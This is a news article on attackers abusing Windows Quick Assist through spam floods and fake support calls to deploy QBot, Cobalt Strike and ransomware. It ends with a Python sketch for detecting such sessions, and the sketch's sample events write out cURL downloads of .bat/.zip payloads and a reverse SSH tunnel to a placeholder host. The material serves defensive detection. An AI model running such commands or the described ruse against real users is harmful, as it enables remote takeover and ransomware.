Microsoft Windows Built-in 'Quick Assist' App Abused by Hackers

TechNews, May 16th: Security company Rapid7 recently issued a press release announcing that the built-in 'Quick Assist' app in Microsoft Windows has been abused by hackers. The hackers first obtained a batch of victim information, then bombarded the victims' email inboxes with spam, and then called the email owners while pretending to be a security company offering to 'provide assistance'. This tricked users into connecting with the hackers through the system's built-in remote management software, after which the hackers took deeper control of the user's device.

The security company stated that the hackers involved may be members of the ransomware group BlackBasta. Starting in mid-April, these hackers used phishing scams to deceive victims, then asked them to press the shortcut CTRL+Win+Q to start Quick Assist and enter a security code. Because the feature is built into Windows, using it also helps maintain the victim's trust.

After taking control of the victim's computer through the 'Quick Assist' app, the hackers use the cURL command to download a series of batch files or ZIP archives, then deploy remote management tools such as ScreenConnect and NetSupportManager, the QBot malware, the penetration testing tool CobaltStrike, and various ransomware on the user's device. In some attacks, the hackers also use OpenSSH to establish an SSH tunnel so they can keep operating in the victim's network environment.
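As an added example (not from Rapid7 or the original article), the following sketch correlates a Quick Assist launch with the follow-on activity described above, cURL downloads of batch/ZIP files and OpenSSH port forwarding, on the same host. The event tuple layout, the 60-minute window, and the sample events are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=60)  # assumed correlation window; tune per environment

# Follow-on behaviours the article describes: cURL fetching batch/ZIP files, OpenSSH tunnelling.
RULES = {
    "curl.exe": (re.compile(r"\.(bat|zip)\b", re.I), "curl download of .bat/.zip"),
    "ssh.exe": (re.compile(r"\s-\w*[RLD]\b"), "ssh port forwarding (-R/-L/-D)"),
}

# Constructed process-creation events (host, time, image, command line); not real incident data.
EVENTS = [
    ("WS-01", "2024-05-10T09:00:00", "quickassist.exe", "quickassist.exe"),
    ("WS-01", "2024-05-10T09:07:00", "curl.exe", "curl.exe -o s.zip https://example.invalid/s.zip"),
    ("WS-01", "2024-05-10T09:15:00", "ssh.exe", "ssh.exe -N -R 8022:127.0.0.1:3389 user@example.invalid"),
    # Benign: archive download with no Quick Assist session on this host.
    ("WS-02", "2024-05-10T10:00:00", "curl.exe", "curl.exe -O https://example.invalid/tools.zip"),
    # Outside the window: download happens hours after the Quick Assist session.
    ("WS-03", "2024-05-10T11:00:00", "quickassist.exe", "quickassist.exe"),
    ("WS-03", "2024-05-10T14:30:00", "curl.exe", "curl.exe -o run.bat https://example.invalid/run.bat"),
]

def correlate(events, window=WINDOW):
    """Return {host: [(time, reason), ...]} for rule hits within `window` of a Quick Assist launch."""
    last_qa, hits = {}, {}
    for host, ts, image, cmd in sorted(events, key=lambda e: e[1]):
        when = datetime.fromisoformat(ts)
        image = image.lower()
        if image == "quickassist.exe":
            last_qa[host] = when  # remember the most recent session start per host
            continue
        rule = RULES.get(image)
        started = last_qa.get(host)
        if rule and started and when - started <= window and rule[0].search(cmd):
            hits.setdefault(host, []).append((ts, rule[1]))
    return hits

if __name__ == "__main__":
    for host, found in correlate(EVENTS).items():
        for ts, reason in found:
            print(f"{host} {ts} {reason} after Quick Assist session")
```

Only WS-01 is reported, because its downloads and tunnel follow a Quick Assist launch within the window; the same commands on hosts without a recent session are left alone.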

TapTechNews noted that Microsoft introduced the 'Quick Assist' app in Windows 10, mainly so that technicians can remotely help users troubleshoot problems over the internet. Microsoft first provided similar functionality, called 'Windows Remote Assistance', in the Windows XP operating system, but hackers have only recently begun to abuse these functions for attacks.
